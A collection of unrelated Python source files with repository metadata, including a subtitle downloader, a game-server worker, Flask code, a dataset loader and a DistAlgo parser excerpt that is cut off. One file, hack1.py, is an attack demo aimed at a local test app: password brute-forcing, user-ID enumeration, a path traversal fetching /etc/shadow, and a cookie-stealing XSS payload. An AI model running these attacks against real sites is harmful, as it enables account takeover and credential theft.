print('Detected subtitles for "' + episode_path)
for language in lang:
result.add(language.alpha3)
else:
subtitles = subliminal.download_best_subtitles({video, }, lang,
providers=['opensubtitles', 'podnapisi'])
for vid, video_subtitles in subtitles.items():
if video_subtitles:
for sub in video_subtitles:
print('Downloaded subtitles "' + save_subtitle(vid, sub) + '" for "' + episode_path + '"')
result.add(sub.language.alpha3)
return result
|
rkohser/gustaf
|
app/core/subtitlesdownloader.py
|
Python
|
mit
| 1,561
|
import urllib.request
import requests
from hashlib import md5
import json
import os
from time import gmtime, strftime
with open("config.json") as configfile:
config = json.load(configfile)
MANAGER_URL = config["MANAGER_URL"]
SECRET_FOLDER = config["SECRET_FOLDER"]
CAPABILITIES = config.get("CAPABILITIES", [])
def getTask():
"""Gets either a run or a compile task from the API"""
params = {
"capability": CAPABILITIES,
}
content = requests.get(MANAGER_URL+"task", params=params).text
print("Task call %s\n" % content)
if content == "null":
return None
else:
return json.loads(content)
def getBotHash(user_id, bot_id, is_compile=False):
"""Gets the checksum of a user's bot's zipped source code"""
params = {
"user_id": user_id,
"bot_id": bot_id
}
if is_compile:
params["compile"] = 1
result = requests.get(MANAGER_URL+"botHash", params=params)
print("Getting bot hash %s\n" % result.text)
return json.loads(result.text).get("hash")
def storeBotLocally(user_id, bot_id, storage_dir, is_compile=False):
"""
Download and store a bot's zip file locally
Checks the file's checksum to make sure the file was downloaded properly
"""
iterations = 0
while iterations < 100:
url = MANAGER_URL + "botFile?user_id={}&bot_id={}".format(user_id, bot_id)
if is_compile:
url += "&compile=1"
print("Bot file url %s\n" % url)
remote_zip = urllib.request.urlopen(url)
zip_filename = remote_zip.headers.get('Content-disposition').split("filename")[1]
zip_path = os.path.join(storage_dir, zip_filename)
if os.path.exists(zip_path):
os.remove(zip_path)
remote_zip_contents = remote_zip.read()
remote_zip.close()
local_zip = open(zip_path, "wb")
local_zip.write(remote_zip_contents)
local_zip.close()
content_hash = md5(remote_zip_contents).hexdigest()
remote_hash = getBotHash(user_id, bot_id, is_compile)
if content_hash != remote_hash:
iterations += 1
continue
return zip_path
raise RuntimeError("Could not download bot with valid hash, aborting")
def storeBotRemotely(user_id, bot_id, zip_file_path):
"""Posts a bot file to the manager"""
zip_contents = open(zip_file_path, "rb").read()
iterations = 0
local_hash = md5(zip_contents).hexdigest()
while iterations < 100:
r = requests.post(MANAGER_URL+"botFile",
data={
"user_id": str(user_id),
"bot_id": str(bot_id),
},
files={"bot.zip": zip_contents})
print("Posting compiled bot archive %s\n" % r.text)
# Try again if local and remote hashes differ
if local_hash != getBotHash(user_id, bot_id):
print("Hashes do not match! Redoing file upload...\n")
iterations += 1
continue
return
raise RuntimeError("Could not upload bot with valid hash, aborting")
def compileResult(user_id, bot_id, did_compile, language, errors=None):
"""Posts the result of a compilation task"""
r = requests.post(MANAGER_URL+"compile", data={
"user_id": user_id,
"bot_id": bot_id,
"did_compile": int(did_compile),
"language": language,
"errors": errors,
})
print("Posted compile result %s\n" % r.text)
def gameResult(users, game_output):
"""
POST the results of a game to the game coordinator.
:param users:
:param game_output: The parsed JSON result the game gives in quiet mode.
:return:
"""
replay_path = game_output["replay"]
print("Posting game result %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
files = {os.path.basename(replay_path): open(replay_path, "rb").read()}
for path in game_output["error_logs"].values():
files[os.path.basename(path)] = open(path, "rb").read()
data = {
"users": json.dumps(users),
"game_output": json.dumps(game_output),
}
print("Uploading game result")
print(json.dumps(users, indent=4))
print(json.dumps(game_output, indent=4))
r = requests.post(MANAGER_URL+"game", data=data, files=files)
print("Got game result %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
print("\n-------Game result:-----")
print(r.text)
print("------------------------\n")
|
lanyudhy/Halite-II
|
apiserver/worker/backend.py
|
Python
|
mit
| 4,570
|
#!/usr/bin/python3
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import re
import requests
def guess_password(driver):
driver.get("http://127.0.0.1:5000/")
with open("names.txt", "r") as f:
names = f.read()
print(names)
names = names.split("\n")
print(names)
usernames = []
for name in names:
usernames.append(name.replace(" ", "."))
with open("dictionary.txt") as f:
passwords = f.read()
passwords = passwords.split("\n")
print(passwords)
for user in usernames:
for password in passwords:
print("Trying Username: {} with Password: {}".format(user, password))
elem = driver.find_element_by_name("username")
elem.send_keys(user)
time.sleep(0.11)
elem = driver.find_element_by_name("password")
elem.send_keys(password)
time.sleep(0.1)
elem.send_keys(Keys.RETURN)
time.sleep(0.1)
src = driver.page_source
login_err_found = re.search(r'Wrong username', src)
if login_err_found is None:
print("Found the password! Username: {} with Password: {}".format(user, password))
return user,password
return "Not found"
def brute_force_login(driver):
driver.get("http://127.0.0.1:5000/")
page_text = guess_password(driver)
print(page_text)
def sess_pred(driver):
run = True
base = "http://127.0.0.1:5000/"
counter = 0
users_found = []
while run is True:
try:
counter += 1
url = base + "user_data/user" + str(counter)
print("\n Trying {}".format(url))
driver.get(url)
r = requests.get(url)
print(r.status_code)
if r.status_code != 200:
run = False
else:
users_found.append(counter-1)
print(r.text)
except:
print("breaking...")
break
print(users_found)
return users_found
def directory_transversal(driver):
url = "http://127.0.0.1:5000/get_file/..%2fetc/shadow"
driver.get(url)
r = requests.get(url)
print(r.text)
return r.text
def xss_attack(driver):
driver.get("http://127.0.0.1:5000/blog")
elem = driver.find_element_by_name("post")
elem.send_keys("<script>document.write(document.cookie);</script>")
elem.send_keys(Keys.RETURN)
driver.get("http://127.0.0.1:5000/blog")
print(driver.page_source)
return driver.page_source
if __name__ == '__main__':
fireFoxOptions = webdriver.FirefoxOptions()
fireFoxOptions.headless = True
driver = webdriver.Firefox(options=fireFoxOptions)
## Uncomment one of the functions below to run a specific hack
#brute_force_login(driver)
#sess_pred(driver)
#directory_transversal(driver)
#xss_attack(driver)
driver.close()
|
shantnu/PythonForHackers
|
hack1.py
|
Python
|
mit
| 2,989
|
#!/usr/bin/env python3
#-*- encoding: utf-8 -*-
import os, sys, tempfile, unittest
import lxml.etree as etree
ECMDS_INSTALL_DIR = os.path.normpath(os.path.join(
os.path.dirname(os.path.realpath(sys.argv[0])),
"..", ".."
))
sys.path.insert(1, ECMDS_INSTALL_DIR + os.sep + 'lib')
from net.ecromedos.error import ECMDSPluginError
import net.ecromedos.plugins.strip as strip
class UTTestPluginStrip(unittest.TestCase):
def test_stripPlainTextContent(self):
content = "<root><p> This is a test. </p></root>"
root = etree.fromstring(content)
plugin = strip.getInstance({})
plugin.process(root.find("./p"), "xhtml")
plugin.flush()
tree = etree.ElementTree(element=root)
expected_result = b'<root><p>This is a test.</p></root>'
result = etree.tostring(tree)
self.assertEqual(result, expected_result)
#end function
def test_stripNestedFormattingNodes(self):
content = "<root><p> <i> <i> </i> </i> <i> X</i> This is a test. <i>X </i> <i> <i> </i> </i> </p></root>"
root = etree.fromstring(content)
plugin = strip.getInstance({})
plugin.process(root.find("./p"), "xhtml")
plugin.flush()
tree = etree.ElementTree(element=root)
expected_result = b'<root><p><i><i></i></i><i>X</i> This is a test. <i>X</i><i><i></i></i></p></root>'
result = etree.tostring(tree)
self.assertEqual(result, expected_result)
#end function
def test_stripStopAtHardNodes(self):
content = "<root><p> <idref/><i> </i> This is a test. <i> </i><counter/></p></root>"
root = etree.fromstring(content)
plugin = strip.getInstance({})
plugin.process(root.find("./p"), "xhtml")
plugin.flush()
tree = etree.ElementTree(element=root)
expected_result = b'<root><p><idref/><i> </i> This is a test. <i> </i><counter/></p></root>'
result = etree.tostring(tree)
self.assertEqual(result, expected_result)
#end function
#end class
if __name__ == "__main__":
unittest.main()
|
tobijk/ecromedos
|
test/ut/test_plugin_strip.py
|
Python
|
mit
| 2,099
|
from flask_wtf import Form
from flask_wtf.html5 import EmailField
from wtforms import StringField, PasswordField
from wtforms.validators import DataRequired
class SingUp(Form):
name = StringField('name', validators=[DataRequired()])
email = EmailField('email', validators=[DataRequired()])
password = PasswordField('password', validators=[DataRequired()])
|
Tboan/academicforge
|
forms.py
|
Python
|
mit
| 368
|
from . import app
from .model import github, pivotal
from flask import request, abort
import requests
import re
PIVOTAL_ACCESS_TOKEN = app.config['PIVOTAL_ACCESS_TOKEN']
GITHUB_ACCESS_TOKEN = app.config['GITHUB_ACCESS_TOKEN']
BLACKLISTED_GITHUB_ACTIONS = ('labeled', 'unlabeled')
def log_and_abort(e):
app.logger.warning('%s. Authorization: %s', e.args[0],
e.request.headers.get('Authorization', 'null'))
return abort(e.response.status_code)
def get_story_ids(title):
_re_story_ids = re.compile(r'[^#]*#(\d+)(?=[,\]\s])')
return (match for match in _re_story_ids.findall(title))
def pull_requests_for_story(owner, repo, story_id):
try:
pull_requests = github.pull_requests(
owner, repo, access_token=GITHUB_ACCESS_TOKEN)
except requests.HTTPError as e:
return log_and_abort(e)
for pull_request in pull_requests:
if story_id not in pull_request['title']:
continue
yield pull_request
def set_pull_request_labels(pull_request, owner, repo):
story_ids = get_story_ids(pull_request['title'])
try:
labels = (story['current_state']
for story in pivotal.stories(
story_ids, access_token=PIVOTAL_ACCESS_TOKEN))
github.set_labels(
pull_request,
owner,
repo,
labels,
access_token=GITHUB_ACCESS_TOKEN)
except requests.HTTPError as e:
return log_and_abort(e)
@app.route('/')
def index():
return ('', 200)
@app.route('/github/<string:secret_key>', methods=['POST'])
def github_hook(secret_key):
if request.json['action'] in BLACKLISTED_GITHUB_ACTIONS:
app.logger.info('Ignoring %r event from github',
request.json['action'])
return ('', 200)
owner = request.json['repository']['owner']['login']
repo = request.json['repository']['name']
pull_request_number = request.json['number']
pull_request = github.pull_request(
owner, repo, pull_request_number, access_token=GITHUB_ACCESS_TOKEN)
set_pull_request_labels(pull_request, owner, repo)
return ('', 204)
@app.route(
'/pivotal/<string:owner>/<string:repo>/<string:secret_key>', # noqa E501
methods=['POST'])
def pivotal_hook(owner, repo, secret_key):
for change in request.json['changes']:
story_id = str(change['id'])
for pull_request in pull_requests_for_story(owner, repo, story_id):
set_pull_request_labels(pull_request, owner, repo)
return ('', 204)
|
bionikspoon/pivotal-github-status
|
app/views.py
|
Python
|
mit
| 2,582
|
import os
import numpy as np
from PIL import Image
import six
import json
import cv2
from io import BytesIO
import common.paths as paths
import numpy as np
from .datasets_base import datasets_base
class horse2zebra_train(datasets_base):
def __init__(self, dataset_path=paths.root_horse2zebra, flip=1, resize_to=172, crop_to=128):
super(horse2zebra_train, self).__init__(flip=flip, resize_to=resize_to, crop_to=crop_to)
self.dataset_path = dataset_path
self.trainAkey = self.read_image_key_file_plaintext(dataset_path + paths.horse2zebra_trainA_key)
self.trainBkey = self.read_image_key_file_plaintext(dataset_path + paths.horse2zebra_trainB_key)
def __len__(self):
return len(self.trainAkey)
def get_example(self, i):
idA = self.trainAkey[np.random.randint(0,len(self.trainAkey))]
idB = self.trainBkey[np.random.randint(0,len(self.trainBkey))]
imgA = cv2.imread(self.dataset_path+'trainA/'+idA, cv2.IMREAD_COLOR)
imgB = cv2.imread(self.dataset_path+'trainB/'+idB, cv2.IMREAD_COLOR)
imgA = self.do_augmentation(imgA)
imgB = self.do_augmentation(imgB)
imgA = self.preprocess_image(imgA)
imgB = self.preprocess_image(imgB)
return imgA, imgB
class horse2zebra_test(datasets_base):
def __init__(self, dataset_path=paths.root_horse2zebra, flip=1, resize_to=172, crop_to=128):
super(horse2zebra_train, self).__init__(flip=flip, resize_to=resize_to, crop_to=crop_to)
self.dataset_path = dataset_path
self.testAkey = self.read_image_key_file_plaintext(dataset_path + paths.horse2zebra_testA_key)
self.testBkey = self.read_image_key_file_plaintext(dataset_path + paths.horse2zebra_testB_key)
def __len__(self):
return len(self.testAkey)
def get_example(self, i):
idA = self.testAkey[i]
idB = self.testBkey[i]
imgA = cv2.imread(self.dataset_path+'testA/'+idA, cv2.IMREAD_COLOR)
imgB = cv2.imread(self.dataset_path+'testB/'+idB, cv2.IMREAD_COLOR)
imgA = self.do_augmentation(imgA)
imgB = self.do_augmentation(imgB)
imgA = self.preprocess_image(imgA)
imgB = self.preprocess_image(imgB)
return imgA, imgB
|
Aixile/chainer-cyclegan
|
datasets/horse2zebra.py
|
Python
|
mit
| 2,254
|
# Copyright (c) 2010-2014 Bo Lin
# Copyright (c) 2010-2014 Yanhong Annie Liu
# Copyright (c) 2010-2014 Stony Brook University
# Copyright (c) 2010-2014 The Research Foundation of SUNY
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import builtins
import sys
from ast import *
from .. import common
from . import dast
from .utils import printe, printw, printd
# DistAlgo keywords
KW_PROCESS_DEF = "process"
KW_CONFIG = "config"
KW_RECV_QUERY = "received"
KW_SENT_QUERY = "sent"
KW_RECV_EVENT = "receive"
KW_SENT_EVENT = "sent"
KW_MSG_PATTERN = "msg"
KW_EVENT_SOURCE = "from_"
KW_EVENT_DESTINATION = "dst"
KW_EVENT_TIMESTAMP = "clk"
KW_EVENT_LABEL = "at"
KW_DECORATOR_LABEL = "labels"
KW_EXISTENTIAL_QUANT = "some"
KW_UNIVERSAL_QUANT = "each"
KW_AGGREGATE_SIZE = "lenof"
KW_AGGREGATE_MIN = "minof"
KW_AGGREGATE_MAX = "maxof"
KW_AGGREGATE_SUM = "sumof"
KW_COMP_SET = "setof"
KW_COMP_TUPLE = "tupleof"
KW_COMP_LIST = "listof"
KW_COMP_DICT = "dictof"
KW_AWAIT = "await"
KW_AWAIT_TIMEOUT = "timeout"
KW_SEND = "send"
KW_SEND_TO = "to"
KW_BROADCAST = "bcast"
KW_PRINT = "output"
KW_SELF = "self"
KW_TRUE = "True"
KW_FALSE = "False"
KW_NULL = "None"
KW_SUCH_THAT = "has"
KW_RESET = "reset"
def is_setup_func(node):
"""Returns True if this node defines a function named 'setup'."""
return (isinstance(node, FunctionDef) and
node.name == "setup")
def extract_label(node):
"""Returns the label name specified in 'node', or None if 'node' is not a
label.
"""
if (isinstance(node, UnaryOp) and
isinstance(node.op, USub) and
isinstance(node.operand, UnaryOp) and
isinstance(node.operand.op, USub) and
isinstance(node.operand.operand, Name)):
return node.operand.operand.id
else:
return None
##########
# Operator mappings:
##########
NegatedOperators = {
NotEq : dast.EqOp,
IsNot : dast.IsOp,
NotIn : dast.InOp
}
OperatorMap = {
Add : dast.AddOp,
Sub : dast.SubOp,
Mult : dast.MultOp,
Div : dast.DivOp,
Mod : dast.ModOp,
Pow : dast.PowOp,
LShift : dast.LShiftOp,
RShift : dast.RShiftOp,
BitOr : dast.BitOrOp,
BitXor : dast.BitXorOp,
BitAnd : dast.BitAndOp,
FloorDiv : dast.FloorDivOp,
Eq : dast.EqOp,
NotEq: dast.NotEqOp,
Lt : dast.LtOp,
LtE : dast.LtEOp,
Gt : dast.GtOp,
GtE : dast.GtEOp,
Is : dast.IsOp,
IsNot : dast.IsNotOp,
In : dast.InOp,
NotIn : dast.NotInOp,
USub : dast.USubOp,
UAdd : dast.UAddOp,
Invert : dast.InvertOp,
And : dast.AndOp,
Or : dast.OrOp
}
# New matrix multiplication operator since 3.5:
if sys.version_info > (3, 5):
OperatorMap[MatMult] = dast.MatMultOp
# FIXME: is there a better way than hardcoding these?
KnownUpdateMethods = {
"add", "append", "extend", "update",
"insert", "reverse", "sort",
"delete", "remove", "pop", "clear", "discard"
}
ValidResetTypes = {"Received", "Sent", ""}
ApiMethods = common.api_registry.keys()
BuiltinMethods = common.builtin_registry.keys()
PythonBuiltins = dir(builtins)
ComprehensionTypes = {KW_COMP_SET, KW_COMP_TUPLE, KW_COMP_DICT, KW_COMP_LIST}
AggregateKeywords = {KW_AGGREGATE_MAX, KW_AGGREGATE_MIN,
KW_AGGREGATE_SIZE, KW_AGGREGATE_SUM}
Quantifiers = {KW_UNIVERSAL_QUANT, KW_EXISTENTIAL_QUANT}
##########
# Exceptions:
class MalformedStatementError(Exception): pass
##########
# Name context types:
class NameContext:
def __init__(self, type=None):
self.type = type
class Assignment(NameContext): pass
class Update(NameContext): pass
class Read(NameContext): pass
class IterRead(Read): pass
class FunCall(NameContext): pass
class Delete(NameContext): pass
class AttributeLookup(NameContext): pass
class SubscriptLookup(NameContext): pass
class PatternContext(NameContext): pass
class Existential(NameContext): pass
class Universal(NameContext): pass
##########
class PatternParser(NodeVisitor):
"""Parses a pattern.
"""
def __init__(self, parser, literal=False):
self._parser = parser
if parser.current_query_scope is None:
self.namescope = dast.NameScope(parser.current_scope)
else:
self.namescope = parser.current_query_scope
self.parent_node = parser.current_parent
self.current_query = parser.current_query
self.use_object_style = parser.use_object_style
self.literal = literal
@property
def outer_scope(self):
return self.namescope.parent_scope
def visit(self, node):
if isinstance(node, Name):
return self.visit_Name(node)
elif isinstance(node, Tuple):
return self.visit_Tuple(node)
elif isinstance(node, List):
return self.visit_List(node)
# Parse general expressions:
self._parser.current_context = Read()
expr = self._parser.visit(node)
if isinstance(expr, dast.ConstantExpr):
return dast.ConstantPattern(self.parent_node, node, value=expr)
else:
return dast.BoundPattern(self.parent_node, node, value=expr)
def is_bound(self, name):
n = self.namescope.find_name(name)
if n is not None:
for r, _ in n.reads:
if r.is_child_of(self.current_query):
return True
return False
def visit_Name(self, node):
if self._parser.current_process is not None and \
node.id == KW_SELF:
return dast.ConstantPattern(
self.parent_node, node,
value=dast.SelfExpr(self.parent_node, node))
elif node.id == KW_TRUE:
return dast.ConstantPattern(
self.parent_node, node,
value=dast.TrueExpr(self.parent_node, node))
elif node.id == KW_FALSE:
return dast.ConstantPattern(
self.parent_node, node,
value=dast.FalseExpr(self.parent_node, node))
elif node.id == KW_NULL:
return dast.ConstantPattern(
self.parent_node, node,
value=dast.NoneExpr(self.parent_node, node))
elif self.literal:
name = node.id
n = self.outer_scope.find_name(name)
if n is None:
n = self.namescope.add_name(name)
pat = dast.BoundPattern(self.parent_node, node, value=n)
n.add_read(pat)
return pat
name = node.id
if name == "_":
# Wild card
return dast.FreePattern(self.parent_node, node)
elif name.startswith("_"):
# Bound variable:
name = node.id[1:]
n = self.outer_scope.find_name(name)
if n is None:
self._parser.warn(
("new variable '%s' introduced by bound pattern." % name),
node)
n = self.namescope.add_name(name)
pat = dast.BoundPattern(self.parent_node, node, value=n)
n.add_read(pat)
return pat
else:
# Could be free or bound:
name = node.id
if self.is_bound(name):
self._parser.debug("[PatternParser] reusing bound name " +
name, node)
n = self.namescope.find_name(name)
pat = dast.BoundPattern(self.parent_node, node, value=n)
n.add_read(pat)
else:
self._parser.debug("[PatternParser] free name " + name, node)
n = self.namescope.add_name(name)
pat = dast.FreePattern(self.parent_node, node, value=n)
n.add_assignment(pat)
return pat
def visit_Str(self, node):
return dast.ConstantPattern(
self.parent_node, node,
value=dast.ConstantExpr(self.parent_node, node, node.s))
def visit_Bytes(self, node):
return dast.ConstantPattern(
self.parent_node, node,
value=dast.ConstantExpr(self.parent_node, node, node.s))
def visit_Num(self, node):
return dast.ConstantPattern(
self.parent_node, node,
value=dast.ConstantExpr(self.parent_node, node, node.n))
def visit_Tuple(self, node):
return dast.TuplePattern(
self.parent_node, node,
value=[self.visit(e) for e in node.elts])
def visit_List(self, node):
return dast.ListPattern(
self.parent_node, node,
value=[self.visit(e) for e in node.elts])
def visit_Call(self, node):
if not self.use_object_style:
return self.generic_visit(node)
if not isinstance(node.func, Name): return None
elts = [dast.ConstantPattern(
self.parent_node, node,
value=dast.ConstantExpr(self.parent_node,
node.func,
value=node.func.id))]
for e in node.args:
elts.append(self.visit(e))
return dast.TuplePattern(self.parent_node, node,
value=elts)
class Pattern2Constant(NodeVisitor):
def __init__(self, parent):
super().__init__()
self.stack = [parent]
@property
def current_parent(self):
return self.stack[-1]
def visit_ConstantPattern(self, node):
expr = node.value.clone()
expr._parent = self.current_parent
return expr
visit_BoundPattern = visit_ConstantPattern
def visit_TuplePattern(self, node):
expr = TupleExpr(self.current_parent)
self.stack.push(expr)
expr.subexprs = [self.visit(e) for e in node.value]
self.stack.pop()
return expr
def visit_ListPattern(self, node):
expr = ListExpr(self.current_parent)
self.stack.push(expr)
expr.subexprs = [self.visit(e) for e in node.value]
self.stack.pop()
return expr
class PatternFinder(NodeVisitor):
def __init__(self):
self.found = False
# It's a pattern if it has bound variables:
def visit_Name(self, node):
if node.id.startswith("_"):
self.found = True
# It's also a pattern if it contains constants:
def visit_Constant(self, node):
self.found = True
visit_Num = visit_Constant
visit_Str = visit_Constant
visit_Bytes = visit_Constant
visit_NameConstant = visit_Constant
class Parser(NodeVisitor):
"""The main parser class.
"""
def __init__(self, filename="", options=None, execution_context=None):
# used in error messages:
self.filename = filename
# used to construct statement tree, also used for symbol table:
self.state_stack = []
# new statements are appended to this list:
self.current_block = None
self.current_context = None
self.current_label = None
self.current_query_scope = None
self.current_query = None
self.errcnt = 0
self.warncnt = 0
self.program = execution_context if execution_context is not None \
else dast.Program() # Just in case
self.full_event_pattern = (options.full_event_pattern
if hasattr(options,
'full_event_pattern')
else False)
self.use_object_style = (options.enable_object_pattern
if hasattr(options,
'enable_object_pattern')
else False)
self.enable_membertest_pattern = (options.enable_membertest_pattern
if hasattr(options,
'enable_membertest_pattern')
else False)
self.enable_iterator_pattern = (options.enable_iterator_pattern
if hasattr(options,
'enable_iterator_pattern')
else False)
def push_state(self, node):
self.state_stack.append((node,
self.current_context,
self.current_label,
self.current_query_scope,
self.current_block))
def pop_state(self):
(_,
self.current_context,
self.current_label,
self.current_query_scope,
self.current_block) = self.state_stack.pop()
def is_in_setup(self):
if self.current_process is None:
return False
elif isinstance(self.current_scope, dast.Function):
return self.current_scope.name == "setup"
def enter_query(self):
if self.current_query_scope is None:
self.current_query_scope = dast.NameScope(self.current_scope)
self.current_query = self.current_parent
def leave_query(self, node=None):
if self.current_parent is self.current_query:
self.current_query = None
self.current_scope.parent_scope.merge_scope(self.current_query_scope)
if node is not None:
self.audit_query(self.current_parent, node)
@property
def current_parent(self):
return self.state_stack[-1][0]
@property
def current_process(self):
for node, _, _, _, _ in reversed(self.state_stack):
if isinstance(node, dast.Process):
return node
return None
@property
def current_scope(self):
if self.current_query_scope is not None:
return self.current_query_scope
for node, _, _, _, _ in reversed(self.state_stack):
if isinstance(node, dast.NameScope):
return node
return None
@property
def current_loop(self):
for node, _, _, _, _ in reversed(self.state_stack):
if isinstance(node, dast.ArgumentsContainer) or \
isinstance(node, dast.ClassStmt):
break
elif isinstance(node, dast.LoopStmt):
return node
return None
def visit_Module(self, node):
self.program = dast.Program(None, node)
# Populate global scope with Python builtins:
for name in PythonBuiltins:
self.program.add_name(name)
self.push_state(self.program)
self.current_block = self.program.body
self.current_context = Read()
self.body(node.body)
self.pop_state()
def visit_Interactive(self, node):
self.program = dast.InteractiveProgram(None, node)
# Populate global scope with Python builtins:
for name in PythonBuiltins:
self.program.add_name(name)
self.push_state(self.program)
contxtproc = dast.Process()
self.push_state(contxtproc)
# Helpers:
def parse_bases(self, node):
"""Scans a ClassDef's bases list and checks whether the class defined by
'node' is a DistProcess.
A DistProcess is a class whose bases contain the name $KW_PROCESS_DEF.
"""
isproc = False
bases = []
for b in node.bases:
if (isinstance(b, Name) and b.id == KW_PROCESS_DEF):
isproc = True
else:
bases.append(self.visit(b))
return isproc, bases
def parse_pattern_expr(self, node, literal=False):
expr = self.create_expr(dast.PatternExpr, node)
pp = PatternParser(self, literal)
pattern = pp.visit(node)
if pattern is None:
self.error("invalid pattern", node)
self.pop_state()
return None
expr.pattern = pattern
self.pop_state()
return expr
def parse_decorators(self, node):
assert hasattr(node, 'decorator_list')
labels = set()
notlabels = set()
decorators = []
for exp in node.decorator_list:
if isinstance(exp, Call) and exp.func.id == KW_DECORATOR_LABEL:
for arg in exp.args:
l, negated = self.parse_label_spec(arg)
if negated:
notlabels |= l
else:
labels |= l
else:
decorators.append(self.visit(exp))
return decorators, labels, notlabels
def parse_label_spec(self, expr):
negated = False
if (type(expr) is UnaryOp and
type(expr.operand) in {Set, Tuple, List}):
names = expr.operand.elts
negated = True
elif type(expr) in {Set, Tuple, List}:
names = expr.elts
else:
self.error("invalid label spec.", expr)
names = []
result = set()
for elt in names:
if type(elt) is not Name:
self.error("invalid label spec.", elt)
else:
result.add(elt.id)
return result, negated
def parse_event_handler(self, node):
if node.name == KW_RECV_EVENT:
eventtype = dast.ReceivedEvent
elif node.name == KW_SENT_EVENT:
eventtype = dast.SentEvent
else:
# Impossible
return None
extras = []
args = node.args
if len(args.defaults) < len(args.args):
extras.append(args.args[:(len(args.defaults) - len(args.args))])
args.args = args.args[(len(args.defaults) - len(args.args)):]
if args.vararg:
extras.append(args.vararg)
if args.kwonlyargs:
extras.append(args.kwonlyargs)
if args.kwarg:
extras.append(args.kwarg)
if len(extras) > 0:
for node in extras:
self.warn("extraneous arguments in event spec ignored.", node)
events = []
labels = set()
notlabels = set()
self.enter_query()
for key, patexpr in zip(args.args, args.defaults):
if key.arg == KW_EVENT_LABEL:
ls, neg = self.parse_label_spec(patexpr)
if neg:
notlabels |= ls
else:
labels |= ls
continue
pat = self.parse_pattern_expr(patexpr)
if key.arg == KW_MSG_PATTERN:
events.append(dast.Event(self.current_process, ast=node,
event_type=eventtype, pattern=pat))
continue
if len(events) == 0:
self.error("invalid event spec: missing 'msg' argument.", node)
# Add a phony event so we can recover as much as possible:
events.append(dast.Event(self.current_process))
if key.arg == KW_EVENT_SOURCE:
events[-1].sources.append(pat)
elif key.arg == KW_EVENT_DESTINATION:
events[-1].destinations.append(pat)
elif key.arg == KW_EVENT_TIMESTAMP:
events[-1].timestamps.append(pat)
else:
self.warn("unrecognized event parameter '%s'" % key.arg, node)
self.leave_query()
return events, labels, notlabels
def body(self, statements):
"""Process a block of statements.
"""
for stmt in statements:
self.current_context = Read()
self.visit(stmt)
if self.current_label is not None:
# Create a noop statement to hold the last label:
self.create_stmt(dast.NoopStmt, statements[-1])
def proc_body(self, statements):
"""Process the body of a process definition.
Process bodies differs from normal ClassDef bodies in that the names
defined in this scope are visible to the whole process.
"""
for stmt in statements:
if (isinstance(stmt, FunctionDef) and stmt.name not in
{KW_RECV_EVENT, KW_SENT_EVENT}):
self.debug("Adding function %s to process scope." % stmt.name,
stmt)
self.current_scope.add_name(stmt.name)
elif isinstance(stmt, ClassDef):
self.debug("Adding class %s to process scope." % stmt.name,
stmt)
self.current_scope.add_name(stmt.name)
elif isinstance(stmt, Assign):
for expr in stmt.targets:
if isinstance(expr, Name):
self.debug(
"Adding variable %s to process scope." % expr.id,
stmt)
self.current_scope.add_name(expr.id)
elif isinstance(stmt, AugAssign):
if isinstance(target, Name):
self.current_scope.add_name(target.id)
for stmt in statements:
self.visit(stmt)
if self.current_label is not None:
# Create a noop statement to hold the last label:
self.create_stmt(dast.NoopStmt, statements[-1])
def signature(self, node):
"""Process the argument lists."""
assert isinstance(self.current_parent, dast.ArgumentsContainer)
padding = len(node.args) - len(node.defaults)
container = self.current_parent.args
for arg in node.args[:padding]:
container.add_arg(arg.arg)
for arg, val in zip(node.args[padding:], node.defaults):
container.add_defaultarg(arg.arg, self.visit(val))
if node.vararg is not None:
# Python 3.4 compatibility:
if type(node.vararg) is str:
container.add_vararg(node.vararg)
else:
container.add_vararg(node.vararg.arg)
if node.kwarg is not None:
# Python 3.4 compatibility:
if type(node.kwarg) is str:
container.add_kwarg(node.kwarg)
else:
container.add_vararg(node.kwarg.arg)
for kwarg, val in zip(node.kwonlyargs, node.kw_defaults):
container.add_kwonlyarg(kwarg.arg, self.visit(val))
# Top-level blocks:
def visit_ClassDef(self, node):
isproc, bases = self.parse_bases(node)
if isproc:
if type(self.current_parent) is not dast.Program:
self.error("Process definition must be at top level.", node)
initfun = None
bodyidx = None
for idx, s in enumerate(node.body):
if is_setup_func(s):
if initfun is None:
initfun = s
bodyidx = idx
else:
self.error("Duplicate setup() definition.", s)
if initfun is None:
self.error("Process missing 'setup()' definition.", node)
return
n = self.current_scope.add_name(node.name)
proc = dast.Process(self.current_parent, node,
name=node.name, bases=bases)
n.add_assignment(proc)
proc.decorators, _, _ = self.parse_decorators(node)
self.push_state(proc)
self.program.processes.append(proc)
self.program.body.append(proc)
self.signature(initfun.args)
self.current_block = proc.body
# setup() has to be parsed first:
self.proc_body([node.body[bodyidx]] +
node.body[:bodyidx] + node.body[(bodyidx+1):])
proc.setup = proc.body[0]
self.pop_state()
else:
clsobj = dast.ClassStmt(self.current_parent, node,
name=node.name, bases=bases)
if self.current_block is None or self.current_parent is None:
self.error("Statement not allowed in this context.", ast)
else:
self.current_block.append(clsobj)
n = self.current_scope.add_name(node.name)
n.add_assignment(clsobj)
self.current_context = Read()
clsobj.decorators, _, _ = self.parse_decorators(node)
self.push_state(clsobj)
self.current_block = clsobj.body
self.body(node.body)
self.pop_state()
def visit_FunctionDef(self, node):
if (self.current_process is None or
node.name not in {KW_SENT_EVENT, KW_RECV_EVENT}):
# This is a normal method
n = self.current_scope.add_name(node.name)
